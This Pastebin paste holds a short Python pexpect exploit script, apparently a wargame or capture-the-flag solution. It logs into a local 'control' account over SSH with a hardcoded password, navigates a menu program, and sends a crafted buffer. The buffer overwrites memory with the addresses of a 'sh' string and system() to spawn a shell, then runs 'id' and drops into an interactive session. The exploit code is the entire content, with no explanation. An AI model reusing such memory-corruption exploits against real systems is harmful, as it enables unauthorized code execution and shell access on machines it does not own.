Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import pexpect
- import time
- from struct import *
- p = pexpect.spawn("ssh control@localhost")
- p.waitnoecho()
- p.sendline('control porsche')
- p.send('C'*9+'B'*2+' ')
- p.expect('Detach')
- #print p.before
- p.send('3')
- p.expect('A')
- #print p.before
- p.send('B'+'D'*6+' 1')
- structure = ","*4
- structure += "\x06"*4
- structure += "\x06"*4
- structure += "\x08"*4
- structure += pack('<L',0x804856b) # "sh"
- structure += "A"*(0x20-4)
- structure += pack('<L',0x8048940) # system
- p.sendline(structure)
- p.send(' ')
- p.sendline('id')
- p.interact()
- p.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement